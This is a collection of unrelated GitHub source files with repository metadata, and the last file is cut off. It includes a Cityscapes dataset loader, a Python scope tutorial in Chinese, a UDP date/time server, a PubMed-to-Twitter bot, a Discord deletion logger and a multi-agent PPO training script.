numpy\nimport os\nfrom PIL import Image\nfrom torch.utils.data import Dataset\nimport torch\n\n\nclass city_scapes(Dataset):\n def __init__(self, datapath, transform):\n self.dir_path = datapath\n self.image_path = self.dir_path\n print(self.image_path)\n self.filtered_images, self.filtered_filenames = self.get_filtered_data()\n self.labels = self.get_labels(self.filtered_filenames)\n self.transform = transform\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n self.samples = {'image': self.filtered_images[idx], 'label': self.labels[idx]}\n if self.transform:\n self.samples['image'] = self.transform(self.samples['image'])\n return self.samples\n\n def __len__(self):\n return len(self.filtered_images)\n\n\n def image_dims(self, image):\n\n \"\"\"Checks if image contains more pixels than specified threshold\n :param image: input image\n :return: True if number of pixels inside image is larger then size_threshold, false otherwise\n \"\"\"\n #####Insert your code here for subtask 1b#####\n width, height = image.size\n return width * height >= 900\n\n def get_labels(self, filename):\n labels = []\n _MAP_CS_TO_TR_LABEL = {24: 0, 25: 1, 26: 2}\n for name in filename:\n id_ = int(name[-9:-4]) # Get last part of filename which reveals label of image\n base_id = id_ if (id_ < 1000) else id_ // 1000\n labels.append(_MAP_CS_TO_TR_LABEL[base_id])\n return labels\n\n def get_filtered_data(self):\n images = []\n file_names = []\n print(\"fetching data from the data directory\")\n\n for filename in os.listdir(self.image_path):\n img = Image.open(os.path.join(self.image_path, filename)).convert('RGB')\n if img is not None:\n if self.image_dims(img):\n images.append(img)\n file_names.append(filename)\n\n print('Number of Images', len(images))\n print('Number of file names', len(file_names))\n return images, file_names\n","repo_name":"NurAd-Din/ML-WS22","sub_path":"Exercise 05/q1_cnn_pytorch/cs_dataset.py","file_name":"cs_dataset.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71990672439","text":"# 默认参数时可变的数据类型时, 有陷阱。\n # 如果默认参数指向的是可变的数据类型,那么无论调用多少次这个默认参数,这个数据对象指向的都是同一个内存对象。\n'''\ndef func(name,alist=[]):\n alist.append(name)\n return alist\n\nret1 = func('abc')\nprint(ret1) # ['abc']\nret2 = func('bcd')\nprint(ret2) # 按理说,重复执行函数,默认参数为alist=[] ,结果应该只是['bcd'],实际上并不是\n # 因为这两个结果是一个list对象(id相等),结果为['abc','bcd']\n'''\n# 所以想调用一个新的列表,那就要指定参数,而不是使用默认参数的列表对象。\ndef func(name,alist=[]):\n alist.append(name)\n return alist\n\nret1 = func('abc')\nprint(ret1) # ['abc']\nret2 = func('bcd')\nprint(ret2) \nret3 = func('def',[]) # 指定参数,而不是默认参数。\nprint(ret3) \n#['abc']\n#['abc', 'bcd']\n#['def']\n\n\n\n\n\n# 局部作用域的坑\n'''\n# 本该调用全局作用域的变量��,但是py解释器认为局部作用域中声明的变量写在后面了,因此报错。\n# 因此,应该在使用前先定义。\n\ncount = 1\ndef func():\n print(count) # 查询全局作用域的count值\n count = 2 # 声明局部作用域的count值\n print(count) # 输出局部作用域的count值\n\nfunc() # UnboundLocalError: local variable 'count' referenced before assignment\n\n'''\n\n\n# global\n# global关键字用来在函数或其他局部作用域中使用全局变量。\n# 1. 在局部作用域中声明一个全局变量。\n'''\ndef func():\n global name\n name = 'kk'\n print(name)\n\nfunc()\nprint(name) # 在全局作用域中输出了局部作用域中声明的全局变量。\n'''\n\n# 2.修改一个全局变量\n'''\ncount = 1\ndef func():\n # print(count)\n # count += 1 # 会报错。\n global count\n print(count)\n count += 1\n print(count)\n\n'''\n\n# nonlocal\n# nonlocal声明的变量不是局部变量,也不是全局变量,而是外部嵌套函数内的变量。\n# 1.不能够操作全局变量\n'''\ncount = 1\ndef func():\n nonlocal count # 不能操作全局变量。\n count += 1\n'''\n\n# 2.局部作用域:内层函数对外层函数的局部变量进行修改\n'''\ncount = 2\ndef func():\n count = 1\n def inner():\n count += 1 # 正常是不可以的。 \n inner()\n\nfunc()\n\n\n# 但是换一种方式 用nonlocal实现\ncount = 33\ndef func():\n count = 1\n def inner():\n nonlocal count # nonlocal指定后,就可以修改引用的(上一层)的变量了。 但不适用于全局变量,只适用于“E”级别的。\n count += 1\n print(count)\n inner()\n print(count)\nfunc()\n# 结果是: 2 \\n 2\n'''\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jolleykong/kk_life","sub_path":"Python/pystudy/day10/10 的补充.py","file_name":"10 的补充.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"32042334129","text":"import Iindex\nimport json\nimport os\nimport random\nimport string\n\n\ndef writeInvertedIndex(data):\n with open(\"InvertedIndex.json\", \"w\") as write_file:\n json.dump(fromClassToDic(data), write_file, indent=4)\n\n\ndef writeInvertedIndexPositional(data):\n with open(\"InvertedIndexPositional.json\", \"w\") as write_file:\n json.dump(fromClassToDic(data), write_file, indent=4)\n\n\ndef readInvertedIndex(file): # returns list of dic\n if os.stat(file).st_size != 0:\n with open(file, \"r\") as file:\n data = json.load(file)\n data = sorted(data, key=lambda index: index['_Iindex__word'])\n return fromDicToClass(data)\n else:\n index = {}\n print(\"Inverted index is empty \")\n return index\n\n\ndef readInvertedIndexPositional(file): # returns list of dic\n if os.stat(file).st_size != 0:\n with open(file, \"r\") as file:\n data = json.load(file)\n data = sorted(data, key=lambda indexPos: indexPos['_PositionalIndex__word'])\n return fromDicToClassPositional(data)\n else:\n index = {}\n print(\"Positional Inverted index is empty \")\n return index\n\n\n# convert from Dic To to\ndef fromDicToClass(dataset):\n dicIndex = {}\n for data in dataset:\n x = Iindex.Iindex(data[\"_Iindex__word\"], data[\"_Iindex__frequency\"],\n list(map(lambda x: x, data[\"_Iindex__postingList\"])))\n c = dicIndex[x.getWord()] = x\n return dicIndex #\n # convert from Dic To to\n\n\ndef fromDicToClassPositional(dataset):\n dicIndex = {}\n for data in dataset:\n x = Iindex.PositionalIndex(data[\"_PositionalIndex__word\"], data[\"_PositionalIndex__postingList\"])\n c = dicIndex[x.getWord()] = x\n return dicIndex\n\n\n# convert from Class To Dic\ndef fromClassToDic(dataset):\n return list(map(lambda x: vars(x), dataset.values()))\n\n\n# from file to docId\ndef changeDocIdToFileName(id, DocIds):\n if id in DocIds:\n return DocIds[id]\n else:\n return \"\"\n\n\n# generate docId\ndef getDocId(length):\n letters = string.ascii_letters\n result_str = ''.join(random.choice(letters) for i in range(length))\n return result_str\n\n\ndef writeDocId(data):\n with open(\"DocId.json\", \"w\") as write_file:\n json.dump(data, write_file, indent=4)\n\n\ndef writeDocIdPositional(data):\n with open(\"DocIdPositional.json\", \"w\") as write_file:\n json.dump(data, write_file, indent=4)\n\n\ndef readDocId():\n if os.stat(\"DocId.json\").st_size != 0:\n with open(\"DocId.json\", \"r\") as read_file:\n data = json.load(read_file)\n return data\n else:\n dic = {}\n return dic\n\n\ndef readDocIdPositional():\n if os.stat(\"DocIdPositional.json\").st_size != 0:\n with open(\"DocId.json\", \"r\") as read_file:\n data = json.load(read_file)\n return data\n else:\n dic = {}\n return dic\n","repo_name":"shuramishfuh/Inf_retrieval","sub_path":"Inf_retrieval/JsonSer.py","file_name":"JsonSer.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4220952642","text":"import socket\nimport select\nimport datetime\n\n\nIP = \"192.168.1.65\"\nEnglish = [\"x\", \"January\", \"Febuary\", \"March\", \"April\",\"May\", \"June\", \n \"July\", \"August\", \"October\", \"November\", \"December\"]\n\nMaori = [\"x\", \"Kohitatea\", \"Hui-tanguru\", \"Poutu-te-rangi\", \"Paenga-whawha\",\n \"Haratua\", \"Pipiri\", \"Hongongoi\", \"Here-turi-koka\", \"Mahuru\", \n \"Whiringa-a-nuku\", \"Whiringa-a-rangi\", \"Hakihea\"]\n\nGerman = [\"x\", \"Januar\", \"Februar\", \"Marzm\", \"April\", \"Mai\", \"Juni\", \"Juli\",\n \"August\", \"September\", \"Oktober\", \"November\", \"Dezember\"]\n\nLists = [English, Maori, German]\n\nLanguage_Strings = [\"English\", \"Maori\", \"German\"]\n\n\ndef main(portE, portM, portG):\n try:\n english_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n english_socket.bind((IP, portE))\n maori_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n maori_socket.bind((IP, portM))\n german_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n german_socket.bind((IP, portG))\n sockets = [english_socket, maori_socket, german_socket]\n except:\n print(\"Failed to set up socket connection\")\n return 0\n\n while True:\n requests, _, _ = select.select(sockets, [], [])\n count = 0\n for request in requests:\n try:\n data, client_address = request.recvfrom(1024)\n print(\"Request revieved from {}:{}\".format(client_address[0], \n client_address[1]))\n lan_str = Language_Strings[sockets.index(request)] \n except:\n print(\"Error accepting request\")\n return 0\n \n if check_data(data) == 1:\n date = datetime.datetime.now()\n request_type = join2b(data[4], data[5])\n text, lan_num = make_txt(request_type, date, lan_str)\n DT_res = dt_response(request_type, lan_num, date, text)\n try:\n sockets[lan_num-1].sendto(DT_res, client_address)\n print(\"Response sent to {}:{}\".format(client_address[0], \n client_address[1]))\n except:\n print(\"Error sending response to {}:{}\".format(client_address[0],\n client_address[1]))\n se.close()\n sm.close()\n sg.close()\n\n\ndef check_data(data):\n \"\"\"Checks a DT_request packet for errors, returns 1 if there arn't any\"\"\"\n if len(data) != 6:\n print('error: Message Length Incorrect')\n return -1\n \n magic_no = join2b(data[0], data[1])\n if magic_no != 0x497E:\n print('error: Magic Number Incorrect')\n return -2\n \n packet_type = join2b(data[2], data[3])\n if packet_type != 0x0001:\n print('error: Packet Type not recognised')\n return -3\n \n request_type = join2b(data[4], data[5])\n if (request_type != 0x0001) and (request_type != 0x0002):\n print('error: Request Type not recognised')\n return -4\n \n else:\n return 1\n \n \n \ndef join2b(a, b):\n \"\"\"Combines 2 bytes\"\"\"\n x = a << 8 | b\n return x\n\n\ndef make_txt(request_type, date, lan_str):\n \"\"\"Returns a string containing the date or time in the requested language\"\"\"\n if request_type == 1:\n if lan_str == 'English':\n text = \"Todays date is {:0>2} {:0>2}, {:0>4}\".format(Lists[0][date.month], \n date.day, date.year)\n lan_num = 0x01\n elif lan_str == 'Maori':\n text = \"Ko te ra o tenei ra ko {:0>2} {:0>2}, {:0>4}\".format(Lists[1][date.month], \n date.day, date.year)\n lan_num = 0x02\n else:\n text = \"Heute ist der {:0>2}. {:0>2} {:0>4}\".format(date.day, Lists[2][date.month],\n date.year)\n lan_num = 0x03\n \n else: #request_type == 2\n if lan_str == 'English':\n text = \"The current time is {:0>2}:{:0>2}\".format(date.hour, date.minute)\n lan_num = 0x01\n elif lan_str == 'Maori':\n text = \"Ko te wa o tenei wa {:0>2}:{:0>2}\".format(date.hour, date.minute)\n lan_num = 0x02\n else:\n text = \"Die Uhrzeit ist {:0>2}:{:0>2}\".format(date.hour, date.minute)\n lan_num = 0x03\n \n return text, lan_num\n \n \ndef dt_response(r_type, lan_num, date, text):\n \"\"\"composes dt_response packet\"\"\"\n x = text.encode('utf-8')\n res = bytearray(13 + len(x)) \n res[0] = 0x49 \n res[1] = 0x7E\n res[2] = 0x00\n res[3] = 0x02\n res[4] = 0x00\n res[5] = lan_num\n year = date.year.to_bytes(2, 'big')\n res[6] = year[0]\n res[7] = year[1]\n res[8] = date.month\n res[9] = date.day\n res[10] = date.hour\n res[11] = date.minute\n res[12] = len(x)\n count = 13\n for byte in x:\n res[count] = byte\n count += 1\n return res\n\nmain(5001,5002,5003)","repo_name":"obn11/COSC","sub_path":"COSC264/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":5162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38042295651","text":"# Answer: 119551\r\n\r\nimport re\r\n\r\nfile = open (\"03.txt\")\r\n\r\n# Convert raw data\r\ndata = []\r\nxMax = 0\r\nyMax = 0\r\n\r\nfor line in file:\r\n l = int (re.search (\"\\d+(?=,)\" , line).group ())\r\n t = int (re.search (\"(?<=,)\\d+\", line).group ())\r\n w = int (re.search (\"\\d+(?=x)\" , line).group ())\r\n h = int (re.search (\"(?<=x)\\d+\", line).group ())\r\n if l + w > xMax:\r\n xMax = l + w\r\n if t + h > yMax:\r\n yMax = t + h\r\n data.append ((l, t, w, h))\r\n\r\n# Create sheet matrix\r\nsheet = []\r\nfor x in range (xMax):\r\n column = []\r\n for y in range (yMax):\r\n column.append (0)\r\n sheet.append (column)\r\n\r\n# Count overlapping squares\r\noverlaps = 0\r\nfor line in data:\r\n for x in range (line[0], line[0] + line[2]):\r\n for y in range (line[1], line[1] + line[3]):\r\n sheet[x][y] += 1\r\n if sheet[x][y] == 2:\r\n overlaps += 1\r\n\r\nprint (overlaps)\r\nfile.close ()\r\n","repo_name":"distributive/Advent-of-Code-2018","sub_path":"03a.py","file_name":"03a.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30755198630","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"pubmed_twitter_bot.py : a twitter bot searching for the latest articles\non a given subjet on PubMed and publishing on twitter.\"\"\"\n\n__author__ = \"Maxime Borry\"\n__license__ = \"BEERWARE\"\n\nimport time\nimport datetime\nimport argparse\n\n\ndef _get_args():\n '''This function parses and return arguments passed in'''\n parser = argparse.ArgumentParser(\n prog='pubtwitmed',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=f'''\n==========================================================\nPubTwitMed\nA twitter bot publishing regularly all recent scientific\narticles from PubMed related to a given subject.\nAuthor: Maxime Borry\nContact: \nHomepage & Documentation: github.com/maxibor/PubTwitMed\n==========================================================\n ''')\n parser.add_argument(\n '-doi',\n dest=\"doi_db\",\n default=\"./doi_db.txt\",\n help=\"Path to DOI database file /path/to/doi_db.txt\")\n parser.add_argument(\n '-artmax',\n dest=\"artmax\",\n default=15,\n help=\"Max articles to retrieve at each query. Default = 15\")\n parser.add_argument(\n '-topic',\n default=None,\n help=\"Topic to tweet about\")\n parser.add_argument(\n '-email',\n dest=\"entrez_email\",\n default=None,\n help=\"Email for NCBI Entrez.\")\n parser.add_argument(\n '-ck',\n dest=\"consumer_key\",\n default=None,\n help=\"Twitter consumer key\"\n )\n parser.add_argument(\n '-cs',\n dest=\"consumer_secret\",\n default=None,\n help=\"Twitter consumer secret\"\n )\n parser.add_argument(\n '-at',\n dest=\"access_token\",\n default=None,\n help=\"Twitter access token\"\n )\n parser.add_argument(\n '-ats',\n dest=\"access_token_secret\",\n default=None,\n help=\"Twitter access token secret\"\n )\n parser.add_argument(\n '-nak',\n dest=\"ncbi_api_key\",\n default=None,\n help=\"NCBI api key\"\n )\n\n args = parser.parse_args()\n\n doi_db = args.doi_db\n art_max = int(args.artmax)\n topic = args.topic\n entrez_email = args.entrez_email\n cons_key = args.consumer_key\n cons_secret = args.consumer_secret\n acc_tok = args.access_token\n acc_tok_sec = args.access_token_secret\n ncbi_key = args.ncbi_api_key\n\n return(doi_db, art_max, topic, entrez_email, cons_key, cons_secret, acc_tok, acc_tok_sec, ncbi_key)\n\n\nTOPIC_TO_SEARCH_AND_TWEET = \"a topic to search about on pubmed\"\nMAX_NB_ART_TO_GET = 15\nPATH_TO_DOI_DB = \"/path/to/doi_db.txt\"\n\n\ndef twitterbot(string_to_tweet, ck, cs, at, ats):\n '''\n Publish on twitter the string_to_tweet\n\n INPUT :\n string_to_tweet(str): text to tweet\n ck(str): Twitter consumer key\n cs(str): Twitter consumer secret\n at(str): Twitter access token\n ats(str): Twitter access token secret\n\n OUTPUT : None\n '''\n import tweepy\n login = tweepy.OAuthHandler(ck, cs)\n login.set_access_token(at, ats)\n this_api = tweepy.API(login)\n res = this_api.update_status(status=string_to_tweet)\n return(res)\n\n\ndef pubmed_search(search_term, nb_max_articles, entrez_email, ncbi_key):\n '''\n Search Pubmed for the nb_max_articles most recent articles on the\n search_term subject.\n\n INPUT : Search Term(str) and nb_max_articles(int)\n OUPUT : Dictionnary of Lists ['DOI':['Title','First Author','PubDate']]\n '''\n from Bio import Entrez\n\n article_dictionary = {}\n Entrez.email = entrez_email\n if ncbi_key:\n Entrez.api_key = ncbi_key\n max_number_of_articles = nb_max_articles\n\n myhandle = Entrez.esearch(db=\"pubmed\", term=search_term,\n retmax=max_number_of_articles)\n my_record = Entrez.read(myhandle)\n my_list = my_record[\"IdList\"]\n for article in range(0, len(my_list)):\n listId = my_list[article]\n my_secondary_handle = Entrez.esummary(db=\"pubmed\", id=listId)\n my_record = Entrez.read(my_secondary_handle)\n one_article = my_record[0]\n if len(one_article[\"AuthorList\"]) > 1:\n authorlist = one_article[\"AuthorList\"][0].encode(\n 'utf-8').decode(\"utf-8\")+\" et al.\"\n else:\n authorlist = one_article[\"AuthorList\"][0].encode(\n 'utf-8').decode(\"utf-8\")\n try:\n article_dictionary[one_article[\"DOI\"]] = [one_article[\"Title\"],\n authorlist, one_article[\"PubDate\"]]\n except:\n continue\n if ncbi_key:\n time.sleep(0.5)\n else:\n time.sleep(5)\n # break\n return(article_dictionary)\n\n\ndef string_shortener(string_to_shorten, max_size):\n '''\n Shortens titles strings that are more than max_size\n Returns shortened titled strings\n\n INPUT : title_string,max_size(str,int)\n OUPUT : shortened_title_string+\"...\"(str)\n EXAMPLE : title_shortener(title,40)\n '''\n if len(string_to_shorten) > max_size:\n return((string_to_shorten[0:max_size]+\"...\").capitalize())\n\n return(string_to_shorten.capitalize())\n\n\ndef doi_tool(adoi, doi_db):\n '''\n Gets a DOI in input, and check if it already in doi_db.txt file.\n If yes returns \"already\", if not appends it to doi_db.txt and returns the\n direct link to the publication\n\n INPUT :\n DOI_identifier (string)\n doi_db(str): Path to doi.txt file\n OUTPUT : DOI url\n EXAMPLE : doi_tool (\"10.1371/journal.pone.0161211\")\n '''\n\n def doi_url_resolver(adoi):\n '''\n Gets a DOI in input and uses the dx.doi.org service to\n return article url\n\n INPUT : DOI(str)\n OUTPUT : DOI URL(str)\n EXAMPLE : adoi(\"10.1371/example.doi.42\")\n '''\n return(\"http://dx.doi.org/\"+str(adoi))\n\n def doi_checker(doi_string, doi_db):\n '''\n Gets a DOI in input, and check if it already in doi_db.txt file.\n If yes, returns TRUE, if not, returns FALSE and DOI\n\n INPUT :\n DOI(str)\n doi_db(str): Path to doi.txt file\n OUTPUT : True/False(Bool)\n EXAMPLE : doi_checker(\"10.1371/example.doi.42\")\n '''\n dois_list = []\n with open(doi_db, \"r\") as doi_db:\n for line in doi_db:\n line = line.rstrip()\n dois_list.append(line)\n if doi_string in dois_list:\n return(True, \"NA\")\n elif doi_string not in dois_list:\n dois_list.append(doi_string)\n return(False, doi_string)\n\n def doi_appender(doi_string, doi_db):\n '''\n Appends DOI in doi_db.txt\n\n INPUT :\n DOI(str)\n doi_db(str): Path to doi.txt file\n OUTPUT : None\n EXAMPLE : doi_appender(\"10.1371/example.doi.42\")\n '''\n with open(doi_db, \"a\") as doi_db:\n doi_db.write(doi_string+\"\\n\")\n\n if doi_checker(adoi, doi_db)[0] == False:\n doi_appender(doi_checker(adoi, doi_db)[1], doi_db)\n return(doi_url_resolver(adoi))\n else:\n return(\"already\")\n\n\nif __name__ == '__main__':\n DOI_DB, ART_MAX, TOPIC, ENTREZ_EMAIL, CONS_KEY, CONS_SECRET, ACC_TOK, ACC_TOK_SEC, NCBI_KEY = _get_args()\n print(\"> > > > \"+str(datetime.datetime.now()))\n myquery = pubmed_search(TOPIC, ART_MAX, ENTREZ_EMAIL, NCBI_KEY)\n\n for article in myquery:\n mystatus = doi_tool(article, DOI_DB)\n if mystatus != \"already\":\n print(\"DOI : \", article)\n print(\"URL : \", mystatus)\n print(\"Title : \", myquery[article]\n [0].encode('utf-8').decode(\"utf-8\"))\n # final_title = string_shortener(myquery[article][0],60)\n print(\"First Author : \",\n myquery[article][1])\n final_author = myquery[article][1]\n print(\"PubDate : \", myquery[article][2])\n final_date = myquery[article][2]\n final_url = mystatus\n hashtag = f\"#{TOPIC}\"\n try:\n almost_to_tweet = \" - \"+final_author+\" - \"+final_url+\" \"+hashtag\n max_title_len = 200 - len(almost_to_tweet)\n final_title = string_shortener(\n myquery[article][0].encode('utf-8').decode(\"utf-8\"), max_title_len)\n text_to_tweet = final_title+\" - \"+final_author+\" - \"+final_url+\" \"+hashtag\n print(text_to_tweet)\n print(\"tweet length :\", len(text_to_tweet))\n print(\"= = = = = = =\")\n if CONS_KEY and CONS_SECRET and ACC_TOK and ACC_TOK_SEC:\n res = twitterbot(text_to_tweet, CONS_KEY,\n CONS_SECRET, ACC_TOK, ACC_TOK_SEC)\n print(\"Twitter API response:\", res)\n time.sleep(10)\n except Exception as e:\n print(e)\n continue\n","repo_name":"maxibor/PubTwitMed","sub_path":"pubmed_twitter_bot.py","file_name":"pubmed_twitter_bot.py","file_ext":"py","file_size_in_byte":8963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35631297008","text":"#!/usr/bin/env python3.7\n# -*- coding: utf-8 -*-\n\"\"\"DesignSPHysics Velocity Times Dialog \"\"\"\n\nfrom PySide import QtGui\n\nfrom mod.translation_tools import __\n\n\nclass VelocityTimesDialog(QtGui.QDialog):\n \"\"\" Dialog with a table to create velocity times. \"\"\"\n\n def __init__(self, relaxationzone, parent=None):\n super().__init__(parent=parent)\n self.relaxationzone = relaxationzone\n self.velocity_times = relaxationzone.velocity_times\n\n self.main_layout = QtGui.QVBoxLayout()\n self.table = QtGui.QTableWidget(50, 2)\n self.table.setHorizontalHeaderLabels([__(\"Time\"), __(\"Value\")])\n\n self.button_layout = QtGui.QHBoxLayout()\n self.cancel_button = QtGui.QPushButton(__(\"Cancel\"))\n self.ok_button = QtGui.QPushButton(__(\"OK\"))\n self.button_layout.addStretch(1)\n self.button_layout.addWidget(self.cancel_button)\n self.button_layout.addWidget(self.ok_button)\n\n self.main_layout.addWidget(self.table)\n self.main_layout.addLayout(self.button_layout)\n\n self.setLayout(self.main_layout)\n self.ok_button.clicked.connect(self.on_ok)\n self.cancel_button.clicked.connect(self.on_cancel)\n self.fill_data()\n\n def fill_data(self):\n \"\"\" Fills the data from the data structure onto the dialog. \"\"\"\n for row, value in enumerate(self.velocity_times):\n self.table.setItem(row, 0, QtGui.QTableWidgetItem(str(value[0])))\n self.table.setItem(row, 1, QtGui.QTableWidgetItem(str(value[1])))\n\n def on_cancel(self):\n \"\"\" Closes the dialog rejecting it. \"\"\"\n self.reject()\n\n def on_ok(self):\n \"\"\" Saves the dialog data onto the data structure. \"\"\"\n self.velocity_times = list()\n for i in range(self.table.rowCount()):\n table_item_time: QtGui.QTableWidgetItem = self.table.item(i, 0)\n table_item_value: QtGui.QTableWidgetItem = self.table.item(i, 1)\n if table_item_time and table_item_value:\n self.velocity_times.append([float(table_item_time.text()), float(table_item_value.text())])\n self.accept()\n","repo_name":"DualSPHysics/DesignSPHysics","sub_path":"mod/widgets/velocity_times_dialog.py","file_name":"velocity_times_dialog.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"40"} +{"seq_id":"20754039560","text":"import cv2\n\nimg = cv2.imread(\"butterfly.jpg\")\n\ncv2.imshow(\"display Image\",img)\nprint(img)\n\ngry_img = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)\ncv2.imshow(\"Grayscale Image\",gry_img)\n\nprint(gry_img)\n\n\n\ncv2.waitKey(0)","repo_name":"harshitha-22/C104","sub_path":"black.py","file_name":"black.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39418515877","text":"import os\nimport unittest\n\nfrom app.processors.base import ProcessorRegistry\n\nclass ProcessorRegistryTestCase(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.processor_registry = ProcessorRegistry()\n \n def test_get_block_processors(self):\n processors = self.processor_registry.get_block_processors()\n self.assertTrue(processors)\n # for processor in processors:\n # print(processor)\n \n def test_contracts_event_processors(self):\n processors = self.processor_registry.get_event_processors('contracts', 'CodeStored')\n self.assertTrue(processors)\n # for processor in processors:\n # print(processor)\n\n \nif __name__ == '__main__':\n unittest.main()\n","repo_name":"decooio/greenchain-explorer","sub_path":"harvester/app/test/test_processor_registry.py","file_name":"test_processor_registry.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31562330438","text":"import discord\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nclass onMessageDelete(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_message_delete(self, message):\n if isinstance(message.author, discord.Embed) or message.author.bot:\n return \n channel = self.bot.get_channel(int(os.getenv(\"TXC_LOGGING\")))\n deleted_by = None\n if message.guild is not None:\n async for entry in message.guild.audit_logs(limit=1):\n if entry.target == message.author and entry.action == discord.AuditLogAction.message_delete:\n deleted_by = entry.user\n break\n embed = discord.Embed(\n title=f\"Activity Logging System\",\n description=f\"Message from {message.author.mention} deleted by: {deleted_by.mention}\" if deleted_by else f\"Message from {message.author.mention} deleted by himself\",\n color=discord.Color.red())\n embed.add_field(name=\"**Message:**\", value=message.content)\n embed.set_author(name=\"Beliauini Assist\", icon_url=os.getenv(\"LOGO\"))\n embed.set_thumbnail(url=os.getenv(\"LOGO\"))\n embed.set_footer(text=\"Beliauini Assist \\u00A9 2023 - \" + os.getenv(\"VERSION\"))\n if message.attachments:\n attach_url = message.attachments[0].url\n embed.set_image(url=attach_url)\n await channel.send(embed=embed)\n\nasync def setup(bot):\n await bot.add_cog(\n onMessageDelete(bot),\n guilds=[discord.Object(id=os.getenv(\"GUILD_ID\"))]\n )\n","repo_name":"Mightinity/project.beliauini","sub_path":"Beliauini-Assist-Program/events/onMessageDelete.py","file_name":"onMessageDelete.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10294404897","text":"# Definition for a binary tree node.\nfrom typing import Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n \n def __str__(self):\n def inorder_str(node: Optional[TreeNode]) -> str:\n if node == None:\n return \"\"\n return inorder_str(node.left) + \" \" + str(node.val) + \" \" + inorder_str(node.right)\n return inorder_str(self)\n\nclass Solution:\n \n def trimBST(self, root: Optional[TreeNode], low: int, high: int) -> Optional[TreeNode]:\n if root == None:\n return root\n elif root.val < low:\n return self.trimBST(root.right, low, high)\n elif root.val > high:\n return self.trimBST(root.left, low, high)\n else:\n root.left = self.trimBST(root.left, low, high)\n root.right = self.trimBST(root.right, low, high)\n return root\n\n# Test \ns = Solution()\nprint(s.trimBST(TreeNode(1, TreeNode(0), TreeNode(2)), 1, 2))\nprint(s.trimBST(TreeNode(1, TreeNode(-1), TreeNode(2)), 0, 0))\nprint(s.trimBST(TreeNode(3, TreeNode(0, None, TreeNode(2, TreeNode(1))), TreeNode(4)), 1, 3))\n\n","repo_name":"ramzpat/leetcode_practice","sub_path":"assessments/20220730/trim_BST.py","file_name":"trim_BST.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72219399801","text":"#!/usr/bin/env python\r\nimport itertools\r\nimport logging\r\nimport os.path as osp\r\nimport os\r\n\r\nimport click\r\nimport gym\r\nimport ray\r\n\r\nos.environ['CUDA_VISIBLE_DEVICES'] = ''\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\r\n\r\n\r\n@ray.remote(num_cpus=1)\r\ndef train(logdir, env_id, lr, num_timesteps, seed, timesteps_per_batch, cont=False):\r\n from sandbox.ppo_sgd import cmlp_policy\r\n from sandbox.ppo_sgd import cmappo_simple\r\n from rl import logger\r\n from rl.common import set_global_seeds, tf_util as U\r\n from rl import bench\r\n\r\n from gym.envs.registration import register\r\n import multiagent\r\n import make_env\r\n\r\n logger.configure(logdir, format_strs=['stdout', 'log', 'json', 'tensorboard'])\r\n\r\n U.make_session(num_cpu=1).__enter__()\r\n set_global_seeds(seed)\r\n env = make_env.make_env(env_id)\r\n\r\n def policy_fn(name, ob_space, ac_space, index, all_ob_space):\r\n pi = cmlp_policy.MlpPolicy(\r\n name=name, ob_space=ob_space, ac_space=ac_space,\r\n hid_size=64, num_hid_layers=2, index=index, all_ob_space=all_ob_space\r\n )\r\n return pi\r\n\r\n env = bench.Monitor(env, logger.get_dir() and osp.join(logger.get_dir(), \"monitor.json\"), allow_early_resets=True)\r\n env.seed(seed)\r\n gym.logger.setLevel(logging.WARN)\r\n cmappo_simple.learn(\r\n env, policy_fn,\r\n max_timesteps=num_timesteps,\r\n timesteps_per_batch=timesteps_per_batch,\r\n clip_param=0.2, entcoeff=0.01,\r\n optim_epochs=4, optim_stepsize=lr, optim_batchsize=64,\r\n gamma=0.95, lam=0.95, schedule='linear', cont=cont\r\n )\r\n env.close()\r\n return None\r\n\r\n\r\n@click.command()\r\n@click.option('--logdir', default='/tmp', type=click.STRING)\r\n@click.option('--cont', is_flag=True, flag_value=True)\r\ndef main(logdir, cont):\r\n env_ids = [\r\n 'simple_speaker_listener'\r\n ]\r\n lrs = [\r\n 0.0001 # 0.0001, 0.003, 0.0005, 0.0001\r\n ]\r\n seeds = [1]\r\n batch_sizes = [50000]\r\n\r\n 